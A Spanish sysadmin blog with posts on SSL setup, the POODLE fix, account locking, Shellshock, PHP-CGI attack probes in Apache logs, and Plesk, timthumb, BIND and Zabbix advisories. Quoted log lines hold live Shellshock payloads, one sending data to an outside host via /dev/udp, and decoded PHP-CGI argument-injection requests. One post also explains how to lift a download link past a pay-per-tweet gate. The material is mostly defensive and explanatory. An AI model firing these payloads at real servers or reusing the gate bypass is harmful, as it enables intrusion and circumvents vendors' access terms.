Configura wordpress con SSL

La seguridad en las comunicaciones es necesaria, y más vale tarde que nunca. Ahora podemos usar SSL de forma gratuíta gracias a Let’s Encrypt.

Let’s Encrypt es un proyecto de la Linux Foundation con el que colaboran grandes empresas como Cisco y organizaciones como Electronic Frontier Foundation que tiene como objetivo proveer de manera gratuíta certificados de seguridad para todos. Hasta ahora y aún sigue siendo así los certificados cuestan entre 60 y 300 euros dependiendo del tipo de certificado, seguro, etc… con Let’s Encrypt podremos usar un certificado sin tener que gastarnos dinero, el único incoveniente es que caduca a los 90 días y hay que renovarlo. Aunque esto no quiere decir que lo tengas que hacer manualmente, ¡ que trabaje el CRON !

He instalado este certificado para mi dominio, de manera muy sencilla por que uso Plesk y existe un plugin[2] y he cambiado la configuración de wordpress en Ajustes / Generales / Dirección de WordPress (URL) y Dirección del sitio (URL) a https://www.senin.org

Te animo a que tambien uses SSL y muevas tu blog a ssl

[1]https://letsencrypt.org/getting-started/
[2]https://devblog.plesk.com/2015/12/lets-encrypt-plesk/

apache2 mod_ssl poodle atack fix

El año pasado me alegré un poco de no trabajar como adminstrador de sistemas, el continuo escándolo de fallos gordos de seguridad, me hubiera subido la tensión aún más 😀

Uno de los fallos de seguridad fué el llamado ‘POODLE‘ destapado por gente Google, del que llevaban conociendo us existencia bastante tiempo; en resumen permite leer en claro una transmisión de datos que usa ssl con unas ciertas características.

Configurando certificados de Comodo en servidores apache2 de Debian, me he llevado el chasco de que son vulnerables por defecto a POODLE, así que he aquí un copy&paste para solucionarlo en un pis pas.

La solución se basaa en desactivar SSLv3 y listo, todo funciona igual pero nos evitamos ser vulnerables
/etc/apache2/mods-available/ssl.conf
[shell]
SSLProtocol all -SSLv3 -SSLv2
[/shell]

Lo mejor es que esta herramienta de Comodo nos permite chequear y validar si somos vulnerables además de otros tantos chequeos de seguridad:

[raw]
https://sslanalyzer.comodoca.com/?url=www.senin.org
[/raw]

bloquear el acceso de un usuario al sistema GNU/Linux

Imagina que tienes un usuario en el sistema al que solo quieres acceder usando ssh, por ejemplo ‘desarrollo’, para securizar un poco más el sistema, mejor que sólo puedas acceder usando tu clave ssh.
Una forma muy rápida de bloquear el acceso al usuario es editando a mano el fichero /etc/shadow y substituyendo la segunda columna, a la que pertenece el hash de la password por una exclamación ‘!’.

Si este es el /etc/shadow original

desarrollo:$1$Xop0FYH9$IfxyQwBe9b8tiyIkt2P4F/:13262:0:99999:7:::
user2:$1$vXGZLVbS$ElyErNf/agUDsm1DehJMS/:13261:0:99999:7:::

lo cambiamos la segunda columna, por una exclamación

desarrollo:!:13262:0:99999:7:::
user2:$1$vXGZLVbS$ElyErNf/agUDsm1DehJMS/:13261:0:99999:7:::

El acceso al sistema usando login+password queda bloqueado, pero sigue siendo posible el acceso vía ssh

Como alternativa también se puede usar el comando ‘passwd -l’ para bloquear ( lock ) el acceso al sistema
[shell]
# lock user desarrollo
passwd -l desarrollo
[/shell]

Más información en
https://www.debian.org/doc/manuals/debian-reference/ch04.en.html

fallo de seguridad crítico: Shell Shock

Otro fallo gordo de seguridad que compromete la seguridad de miles de máquinas ha sido publicado hace un par de días.
En este caso se trata de un fallo de seguridad en la shell bash que permite inyectar código y ejecutarlo en una variable de entorno.

Para saber si nuestro servidor está comprometido :

[shell]
env x='() { :;}; echo vulnerable’ bash -c ‘echo hello’
[/shell]

Si tu máquina es vulnerable aparecerá en consola
[shell]
vulnerable
hello
[/shell]

Aunque parezca que sólo puede afectar y ser un vector de ataque para usuarios locales, hay que recordar que hay multitud de scripts que chequean y validan por ejemplo logs que almacenan peticiones web, así que como en este ejemplo, podemos inyectar la ejecución de código malicioso sin tener acceso local a la máquina y esperando a los scripts procesen los logs y ejecuten el código inyectado.

[shell]
166.78.61.142 – – [25/Sep/2014:06:28:47 -0400] “GET / HTTP/1.1″ 200 193 “-” “() { :;}; echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444″
24.251.197.244 – – [25/Sep/2014:07:49:36 -0400] “GET / HTTP/1.1″ 200 193 “-” “() { :; }; echo -e x22Content-Type: text/plainx5Cnx22; echo qQQQQQq”
[/shell]

Este es un ejemplo extraído de http://blog.sucuri.net/2014/09/bash-vulnerability-shell-shock-thousands-of-cpanel-sites-are-high-risk.html

Más información acerca del fallo de seguridad:
https://access.redhat.com/security/cve/CVE-2014-6271

keynotopia: Free Twitter Bootstrap 3.0 UI Mockup Templates for Keynote and PowerPoint

Keynotopia es una empresa que se dedica a crear imagenes vectorizadas en alta resolución y las empaqueta en themes OpenOffice, Windows8 , Iphone, Ipad, web … en resumen son conjuntos de imágenes diseñadas para componer maquetas en keynote o powerpoint.
Es muy útil si quieres hacer prototipos de aplicaciones de una forma cómoda y standard, ya que al tener los elementos ya creados sólo permite colocar estos elementos pero no crear ninguno nuevo, aún así es interesante.

He intentando bajar de su página el set de diseño para bootstrap el framework de maquetación de twitter disponibel aquí http://keynotopia.com/bootstrap/ y como pago a cambio solicitar twitear su producto, me ha gustado la idea y he colgado el twit con las indicaciones de keynotopia. No he podido obtener el enlace y bueno… he trasteado un poco para descargarme el contenido.

Para obtener el fichero descargable he abierto firebug y he localizado el bloque html en el que se llama a la acción para twitear el producto
[shell]<div id=»pay-per-tweet»>
<a id=»tweetLink» href=»#»></a><br>
<a href=»#PAY»></a><p></p>
<p style=»font-weight:bold; font-size:14px; color:#B74726; text-align:center; margin-top:-25px;»>Clicking the orange button will pop-up a window where you can edit and confirm the tweet, and then the download button will be activated<br>
<br></p></div>[/shell]
El objeto que genera la acción es id=»tweetLink» así que lo siguiente es buscar código javascript que lo maneje:
[shell]$(document).ready(function(){
// Using our tweetAction plugin. For a complete list with supported
// parameters, refer to http://dev.twitter.com/pages/intents#tweet-intent
$(‘#tweetLink’).tweetAction({
text: ‘Check out Keynotopia: mobile and web UI #design templates for Keynote and PowerPoint. #UX #mockups’,
url: ‘http://keynotopia.com/’,
via: ‘amirkhella’,
related: ‘keynotopia’
},function(){
// When the user closes the pop-up window:
$(‘a.downloadButton’)
.addClass(‘active’)
.attr(‘href’,’https://www.e-junkie.com/ecom/gb.php?c=cart&i=1057391&cl=127351&ejc=2′);
});
});[/shell]

No hay que tener mucha idea para ver una pedazo de url ahí que suena bastante bien además del comentario de código( // When the user closes the pop-up window: ) , así que si la copias y la pegas en el navegador entrarás en el proceso de compra sin coste del producto que queríamos.

Habiendo cumplido las condiciones de twitear la información producto, me he buscado una forma de conseguir el theme sin esperar a que me contesten de Keynotopia.

cosas de logs

Queremos compartir cosas curiosas que vemos en los logs. En este caso es un fragmento en un log de apache de un servidor :

101.78.160.195 - - [03/Nov/2013:23:21:42 +0100] "POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 400 498 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
101.78.160.195 - - [03/Nov/2013:23:21:43 +0100] "POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 400 498 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
101.78.160.195 - - [03/Nov/2013:23:21:44 +0100] "POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 400 498 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
101.78.160.195 - - [03/Nov/2013:23:21:45 +0100] "POST /?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 400 498 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25""

Vemos el chorro raro y tenemos que decodificarlo a ver de se trata:

<?php

$string = <<<EOF
101.78.160.195 - - [03/Nov/2013:23:21:42 +0100] "POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 400 498 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
101.78.160.195 - - [03/Nov/2013:23:21:42 +0100] "POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 400 498 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
101.78.160.195 - - [03/Nov/2013:23:21:43 +0100] "POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 400 498 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
101.78.160.195 - - [03/Nov/2013:23:21:44 +0100] "POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 400 498 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
101.78.160.195 - - [03/Nov/2013:23:21:45 +0100] "POST /?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 400 498 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
EOF;

foreach ( split( "n" , $string )  as $entry ) 
    print urldecode( $entry ) ."n"; 

?>

Con este sencillo script vemos qué intentan hacernos, ya que debe ser algún tipo de bot o gusano buscando servidores vulnerables:

101.78.160.195 - - [03/Nov/2013:23:21:42  0100] "POST /cgi-bin/php5?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n HTTP/1.1" 400 498 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
101.78.160.195 - - [03/Nov/2013:23:21:42  0100] "POST /cgi-bin/php-cgi?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n HTTP/1.1" 400 498 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
101.78.160.195 - - [03/Nov/2013:23:21:43  0100] "POST /cgi-bin/php.cgi?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n HTTP/1.1" 400 498 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
101.78.160.195 - - [03/Nov/2013:23:21:44  0100] "POST /cgi-bin/php4?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n HTTP/1.1" 400 498 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
101.78.160.195 - - [03/Nov/2013:23:21:45  0100] "POST /?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n HTTP/1.1" 400 498 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"

Lo que buscan son servidores en los que puedan desactivar safe_mode, disable_functions, open_basedir y permitir allow_url_include, de forma que puedan inyectar código remoto.

Es interesante dedicarle unos minutos a investigar un poco más en nuestros logs, se ven cosas curiosas 😉

Fallo grave de seguridad en Plesk mod_php

Nos llega información acerda de una fallo de seguridad en Plesk:

«SECURITY ADVISORY:
Parallels Plesk Panel 9.x, 10.x, 11.x – Privilege Escalation Vulnerability

Parallels Customer,

Please read this message in its entirety and take the recommended actions.

Situation

Parallels Plesk Panel privilege escalation vulnerabilities have been
discovered and are described in VU#310500 and CVE-2013-0132,
CVE-2013-0133 (CVSS score 4.4 –
http://www.kb.cert.org/vuls/id/310500).

Impact

This impacts Parallels Plesk Panel for Linux versions 9.x, 10.x, 11.x.

You are at risk if you have Apache web server running mod_php,
mod_perl, mod_python, etc.

You are NOT at risk if you have Apache web server running Fast CGI
(PHP, perl, python, etc.) or CGI (PHP, perl, python, etc.).

Solution

Parallels has issued security updates for Parallels Plesk Panel
versions 9.x-11.x. The security updates for Parallels Plesk Panel 11.x
and Parallels Plesk Panel 10.4.4 will automatically appear inside your
Parallels Plesk Panel control panel – please apply them as soon as
possible.

The security hotfix for Parallels Plesk 9.x is available for download
here: http://kb.parallels.com/115942.

Workaround

Parallels understands that it’s not always practical for immediate
upgrades, so we have provided a solution to fix this vulnerability.
For the immediate solution, customers should read this knowledge base
article for instructions: http://kb.parallels.com/115942.»

Recordamos que para instalar los microupdates de plesk se pueden ejecutar estos comandos :

/usr/local/psa/admin/sbin/autoinstaller --select-release-current --install-component base
/usr/local/psa/admin/sbin/autoinstaller --select-release-current --upgrade-installed-components

fallo de seguridad en componente timthumb afecta a wordpress

Estamos encontrando instalaciones infectadas con wordpress. El punto de entrada es la galería de imágenes timthumb.php que se usa muy frecuentemente en wordpress tanto en themes como en plugins.
Además no se le suele prestar atención a este fichero y pasa por alto en las revisiones. Si no tenemos desactivado allow_url_fopen en php y la version es vieja, seguramente nos habrán colado en alguna ocasión algún script en php.

Para chequear nuestra instalación hemos creado un sencillo script en perl que puedes descargar aqui timthumb-checker.pl

#!/usr/bin/perl -w 

# timthumb.php vulnerability checker 
# search for vulnerable files and suspect  files
# http://www.exploit-db.com/exploits/17602/
#
# http://www.hostingaldescubierto.com 
# contact : jorge@senin.org
#

sub searchFiles  {
    my ( $VHOST_DIR ) = shift  ||  "/var/www/vhosts";
    
print "Searching at $VHOST_DIR...n";

my @files = qx{find ${VHOST_DIR} -name "*thumb.php"};

return @files ;

}



sub checkVersions {
            
    my @files = @_  ;
    
foreach $file (@files) {
    chop( $file );
    # search for version at file 
    @versions = qx{ grep "VERSION" ${file} };
    foreach my$version ( @versions ) {
        # extract version info
        
        if ( my ( $mayor, $minor, $revision )  = ( $version =~ /'(d{1,2}).(d{1,2}).(d{1,2})'/m )) {

            if ( $mayor < 2 ) {
                if ( $minor < 33 ) {
                    print "WARNING VULNERABLE !  version ($mayor.$minor.$revision) at $filen ";
                }
                else {
                    print "WARNING! seems not vulnerable but obsolete: version ($mayor.$minor.$revision) at $filen ";
                }
            }
            else {
                print "not vulnerable version ($mayor.$minor.$revision) at $filen";
            }
        }

    }
}

}

sub searchInfected {
    
    my ( $VHOST_DIR ) = shift  ||  "/var/www/vhosts";
    
    @files = qx{find ${VHOST_DIR} -path "*/cache/*php"};
    foreach my $file ( @files ) {
        chop( $file );
        print "Warning ! $file must not to be there!!!!n";
    }
    
}

  
my $path = $ARGV[0];
my @files = searchFiles($path);
checkVersions(@files);
searchInfected( $path );

[DSA-2560-1] Fallo de seguridad en Bind DNS server

En los boletines de seguridad  de Debian se ha publicado la noticia del fallo de seguridad que afecta al servicio DNS bind así como el paquete actualizado que corrige el fallo DSA-2560-1.

Es importante conocer que el fallo provoca que se detenga el servicio de DNS ( Denial of service ). Según se indica de forma escueta,el servicio falla al intentar construir un paquete de respuesta cuando hay una combinación específica de registros DNS. Este caso afecta tanto a servidores autoritativos como recursivos.

It was discovered that BIND, a DNS server, hangs while constructing the additional section of a DNS reply, when certain combinations of resource records are present. This vulnerability affects both recursive and authoritative servers.

Zabbix SQL Injection: Actualización de seguridad

Se recomienda encarecidamente actualizar los paquetes de zabbix debido a un fallo de seguridad ( SQL Injection ) publicado ayer 6 de Septiembre de 2012.

Concretamente el fallo permite obtener sesiones y agregar scripts que se ejecutan bajo el demonio de zabbix, casi nada…

 Zabbix

 

Más información:

https://support.zabbix.com/browse/ZBX-5348

http://www.debian.org/security/2012/dsa-2539

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3435

Exploit:

http://www.exploit-db.com/exploits/20087